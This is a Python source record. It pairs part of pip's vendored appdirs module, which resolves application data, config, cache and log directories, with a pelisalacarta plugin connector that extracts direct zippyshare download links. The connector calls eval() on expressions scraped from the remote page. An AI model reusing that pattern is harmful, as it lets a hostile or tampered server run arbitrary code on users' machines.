path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
elif system == 'darwin':
path = os.path.expanduser('~/Library/Application Support/')
if appname:
path = os.path.join(path, appname)
else:
path = os.getenv('XDG_DATA_HOME', os.path.expanduser("~/.local/share"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def site_data_dir(appname=None, appauthor=None, version=None, multipath=False):
r"""Return full path to the user-shared data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"multipath" is an optional parameter only applicable to *nix
which indicates that the entire list of data dirs should be
returned. By default, the first item from XDG_DATA_DIRS is
returned, or '/usr/local/share/<AppName>',
if XDG_DATA_DIRS is not set
Typical site data directories are:
Mac OS X: /Library/Application Support/<AppName>
Unix: /usr/local/share/<AppName> or /usr/share/<AppName>
Win XP: C:\Documents and Settings\All Users\Application Data\<AppAuthor>\<AppName>
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
Win 7: C:\ProgramData\<AppAuthor>\<AppName> # Hidden, but writeable on Win 7.
For Unix, this is using the $XDG_DATA_DIRS[0] default.
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
"""
if system == "win32":
if appauthor is None:
appauthor = appname
path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA"))
if appname:
if appauthor is not False:
path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
elif system == 'darwin':
path = os.path.expanduser('/Library/Application Support')
if appname:
path = os.path.join(path, appname)
else:
# XDG default for $XDG_DATA_DIRS
# only first, if multipath is False
path = os.getenv('XDG_DATA_DIRS',
os.pathsep.join(['/usr/local/share', '/usr/share']))
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)]
if appname:
if version:
appname = os.path.join(appname, version)
pathlist = [os.path.join(x, appname) for x in pathlist]
if multipath:
path = os.pathsep.join(pathlist)
else:
path = pathlist[0]
return path
if appname and version:
path = os.path.join(path, version)
return path
def user_config_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific config dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user config directories are:
Mac OS X: same as user_data_dir
Unix: ~/.config/<AppName> # or in $XDG_CONFIG_HOME, if defined
Win *: same as user_data_dir
For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME.
That means, by default "~/.config/<AppName>".
"""
if system in ["win32", "darwin"]:
path = user_data_dir(appname, appauthor, None, roaming)
else:
path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser("~/.config"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
# for the discussion regarding site_config_dir locations
# see <https://github.com/pypa/pip/issues/1733>
def site_config_dir(appname=None, appauthor=None, version=None, multipath=False):
r"""Return full path to the user-shared data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"multipath" is an optional parameter only applicable to *nix
which indicates that the entire list of config dirs should be
returned. By default, the first item from XDG_CONFIG_DIRS is
returned, or '/etc/xdg/<AppName>', if XDG_CONFIG_DIRS is not set
Typical site config directories are:
Mac OS X: same as site_data_dir
Unix: /etc/xdg/<AppName> or $XDG_CONFIG_DIRS[i]/<AppName> for each value in
$XDG_CONFIG_DIRS
Win *: same as site_data_dir
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
For Unix, this is using the $XDG_CONFIG_DIRS[0] default, if multipath=False
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
"""
if system in ["win32", "darwin"]:
path = site_data_dir(appname, appauthor)
if appname and version:
path = os.path.join(path, version)
else:
# XDG default for $XDG_CONFIG_DIRS (missing or empty)
# see <https://github.com/pypa/pip/pull/7501#discussion_r360624829>
# only first, if multipath is False
path = os.getenv('XDG_CONFIG_DIRS') or '/etc/xdg'
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep) if x]
if appname:
if version:
appname = os.path.join(appname, version)
pathlist = [os.path.join(x, appname) for x in pathlist]
if multipath:
path = os.pathsep.join(pathlist)
else:
path = pathlist[0]
return path
def user_cache_dir(appname=None, appauthor=None, version=None, opinion=True):
r"""Return full path to the user-specific cache dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"opinion" (boolean) can be False to disable the appending of
"Cache" to the base app data dir for Windows. See
discussion below.
Typical user cache directories are:
Mac OS X: ~/Library/Caches/<AppName>
Unix: ~/.cache/<AppName> (XDG default)
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Cache
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Cache
On Windows the only suggestion in the MSDN docs is that local settings go in
the `CSIDL_LOCAL_APPDATA` directory. This is identical to the non-roaming
app data dir (the default returned by `user_data_dir` above). Apps typically
put cache data somewhere *under* the given dir here. Some examples:
...\Mozilla\Firefox\Profiles\<ProfileName>\Cache
...\Acme\SuperApp\Cache\1.0
OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value.
This can be disabled with the `opinion=False` option.
"""
if system == "win32":
if appauthor is None:
appauthor = appname
path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))
# When using Python 2, return paths as bytes on Windows like we do on
# other operating systems. See helper function docs for more details.
if not PY3 and isinstance(path, unicode):
path = _win_path_to_bytes(path)
if appname:
if appauthor is not False:
path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
if opinion:
path = os.path.join(path, "Cache")
elif system == 'darwin':
path = os.path.expanduser('~/Library/Caches')
if appname:
path = os.path.join(path, appname)
else:
path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache'))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def user_state_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific state dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user state directories are:
Mac OS X: same as user_data_dir
Unix: ~/.local/state/<AppName> # or in $XDG_STATE_HOME, if defined
Win *: same as user_data_dir
For Unix, we follow this Debian proposal <https://wiki.debian.org/XDGBaseDirectorySpecification#state>
to extend the XDG spec and support $XDG_STATE_HOME.
That means, by default "~/.local/state/<AppName>".
"""
if system in ["win32", "darwin"]:
path = user_data_dir(appname, appauthor, None, roaming)
else:
path = os.getenv('XDG_STATE_HOME', os.path.expanduser("~/.local/state"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def user_log_dir(appname=None, appauthor=None, version=None, opinion=True):
r"""Return full path to the user-specific log dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"opinion" (boolean) can be False to disable the appending of
"Logs" to the base app data dir for Windows, and "log" to the
base cache dir for Unix. See discussion below.
Typical user log directories are:
Mac OS X: ~/Library/Logs/<AppName>
Unix: ~/.cache/<AppName>/log # or under $XDG_CACHE_HOME if defined
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Logs
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Logs
On Windows the only suggestion in the MSDN docs is that local settings
go in the `CSIDL_LOCAL_APPDATA` directory. (Note: I'm interested in
examples of what some windows apps use for a logs dir.)
OPINION: This function appends "Logs" to the `CSIDL_LOCAL_APPDATA`
value for Windows and appends "log" to the user cache dir for Unix.
This can be disabled with the `opinion=False` option.
"""
if system == "darwin":
path = os.path.join(
os.path.expanduser('~/Library/Logs'),
appname)
elif system == "win32":
path = user_data_dir(appname, appauthor, version)
version = False
if opinion:
path = os.path.join(path, "Logs")
else:
path = user_cache_dir(appname, appauthor, version)
version = False
if opinion:
path = os.path.join(path, "log")
if appname and version:
path = os.path.join(path, version)
return path
class AppDirs(object):
"""Convenience wrapper for getting application dirs."""
def __init__(self, appname=None, appauthor=None, version=None,
roaming=False, multipath=False):
self.appname = appname
self.appauthor = appauthor
self.version = version
self.roaming = roaming
self.multipath = multipath
@property
def user_data_dir(self):
return user_data_dir(self.appname, self.appauthor,
version=self.version, roaming=self.roaming)
@property
def site_data_dir(self):
return site_data_dir(self.appname, self.appauthor,
version=self.version, multipath=self.multipath)
@property
def user_config_dir(self):
return user_config_dir(self.appname, self.appauthor,
version=self.version, roaming=self.roaming)
@property
def site_config_dir(self):
return site_config_dir(self.appname, self.appauthor,
version=self.version, multipath=self.multipath)
@property
def user_cache_dir(self):
return user_cache_dir(self.appname, self.appauthor,
version=self.version)
@property
def user_state_dir(self):
return user_state_dir(self.appname, self.appauthor,
version=self.version)
@property
def user_log_dir(self):
return user_log_dir(self.appname, self.appauthor,
version=self.version)
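# Usage sketch (editor's addition): a vendored consumer can call the module-level
# helpers directly or go through AppDirs; both forms below resolve to the same
# per-user cache directory ("pip" is just an illustrative application name).
#
#   from pip._vendor import appdirs
#   cache = appdirs.user_cache_dir("pip")
#   dirs = appdirs.AppDirs("pip")
#   assert dirs.user_cache_dir == cache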
#---- internal support stuff
def _get_win_folder_from_registry(csidl_name):
"""This is a fallback technique at best. I'm not sure if using the
registry for this guarantees us the correct answer for all CSIDL_*
names.
"""
if PY3:
import winreg as _winreg
else:
import _winreg
shell_folder_name = {
"CSIDL_APPDATA": "AppData",
"CSIDL_COMMON_APPDATA": "Common AppData",
"CSIDL_LOCAL_APPDATA": "Local AppData",
}[csidl_name]
key = _winreg.OpenKey(
_winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
)
dir, type = _winreg.QueryValueEx(key, shell_folder_name)
return dir
def _get_win_folder_with_pywin32(csidl_name):
from win32com.shell import shellcon, shell
dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0)
# Try to make this a unicode path because SHGetFolderPath does
# not return unicode strings when there is unicode data in the
# path.
try:
dir = unicode(dir)
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in dir:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
try:
import win32api
dir = win32api.GetShortPathName(dir)
except ImportError:
pass
except UnicodeError:
pass
return dir
def _get_win_folder_with_ctypes(csidl_name):
import ctypes
csidl_const = {
"CSIDL_APPDATA": 26,
"CSIDL_COMMON_APPDATA": 35,
"CSIDL_LOCAL_APPDATA": 28,
}[csidl_name]
buf = ctypes.create_unicode_buffer(1024)
ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf)
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in buf:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
buf2 = ctypes.create_unicode_buffer(1024)
if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024):
buf = buf2
return buf.value
def _get_win_folder_with_jna(csidl_name):
import array
from com.sun import jna
from com.sun.jna.platform import win32
buf_size = win32.WinDef.MAX_PATH * 2
buf = array.zeros('c', buf_size)
shell = win32.Shell32.INSTANCE
shell.SHGetFolderPath(None, getattr(win32.ShlObj, csidl_name), None, win32.ShlObj.SHGFP_TYPE_CURRENT, buf)
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in dir:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
buf = array.zeros('c', buf_size)
kernel = win32.Kernel32.INSTANCE
if kernel.GetShortPathName(dir, buf, buf_size):
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
return dir
if system == "win32":
try:
from ctypes import windll
_get_win_folder = _get_win_folder_with_ctypes
except ImportError:
try:
import com.sun.jna
_get_win_folder = _get_win_folder_with_jna
except ImportError:
_get_win_folder = _get_win_folder_from_registry
def _win_path_to_bytes(path):
"""Encode Windows paths to bytes. Only used on Python 2.
Motivation is to be consistent with other operating systems where paths
are also returned as bytes. This avoids problems mixing bytes and Unicode
elsewhere in the codebase. For more details and discussion see
<https://github.com/pypa/pip/issues/3463>.
If encoding using ASCII and MBCS fails, return the original Unicode path.
"""
for encoding in ('ASCII', 'MBCS'):
try:
return path.encode(encoding)
except (UnicodeEncodeError, LookupError):
pass
return path
#---- self test code
if __name__ == "__main__":
appname = "MyApp"
appauthor = "MyCompany"
props = ("user_data_dir",
"user_config_dir",
"user_cache_dir",
"user_state_dir",
"user_log_dir",
"site_data_dir",
"site_config_dir")
print("-- app dirs %s --" % __version__)
print("-- app dirs (with optional 'version')")
dirs = AppDirs(appname, appauthor, version="1.0")
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (without optional 'version')")
dirs = AppDirs(appname, appauthor)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (without optional 'appauthor')")
dirs = AppDirs(appname)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (with disabled 'appauthor')")
dirs = AppDirs(appname, appauthor=False)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
|
mit
|
superberny70/pelisalacarta
|
python/main-classic/servers/zippyshare.py
|
2
|
2457
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Connector for zippyshare
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
import re
from core import httptools
from core import logger
from core import scrapertools
def test_video_exists(page_url):
result = False
message = ''
try:
error_message_file_not_exists = 'File does not exist on this server'
error_message_file_deleted = 'File has expired and does not exist anymore on this server'
data = httptools.downloadpage(page_url).data
if error_message_file_not_exists in data:
message = 'File does not exist.'
elif error_message_file_deleted in data:
message = 'File deleted.'
else:
result = True
except Exception as ex:
        message = str(ex)
return result, message
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s')" % page_url)
video_urls = []
data = httptools.downloadpage(page_url).data
match = re.search('(.+)/v/(\w+)/file.html', page_url)
domain = match.group(1)
patron = 'getElementById\(\'dlbutton\'\).href\s*=\s*(.*?);'
media_url = scrapertools.find_single_match(data, patron)
numbers = scrapertools.find_single_match(media_url, '\((.*?)\)')
url = media_url.replace(numbers, "'%s'" % eval(numbers))
url = eval(url)
mediaurl = '%s%s' % (domain, url)
extension = "." + mediaurl.split('.')[-1]
video_urls.append([extension + " [zippyshare]", mediaurl])
return video_urls
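# How get_video_url above rebuilds the link (editor's note, markup shown is an
# assumption for illustration only): the page's 'dlbutton' script assigns
# something like
#   "/d/hPYzJSWA/" + (264158 % 51245 + 264158 % 913) + "/video.mp4"
# The code extracts that expression, eval()s only the arithmetic inside the
# parentheses, substitutes the result back as a quoted string, eval()s the
# remaining string concatenation, and finally prepends the original domain.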
# Finds this server's videos in the given text
def find_videos(data):
encontrados = set()
devuelve = []
# http://www5.zippyshare.com/v/11178679/file.html
# http://www52.zippyshare.com/v/hPYzJSWA/file.html
patronvideos = '([a-z0-9]+\.zippyshare.com/v/[A-z0-9]+/file.html)'
logger.info("#" + patronvideos + "#")
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for match in matches:
titulo = "[zippyshare]"
url = "http://" + match
if url not in encontrados:
logger.info(" url=" + url)
devuelve.append([titulo, url, 'zippyshare'])
encontrados.add(url)
else:
logger.info(" url duplicada=" + url)
return devuelve
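# Example (editor's note): given text containing
#   http://www52.zippyshare.com/v/hPYzJSWA/file.html
# find_videos() returns
#   [["[zippyshare]", "http://www52.zippyshare.com/v/hPYzJSWA/file.html", "zippyshare"]]
# and the 'encontrados' set keeps duplicate URLs from being reported twice.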
|
gpl-3.0
|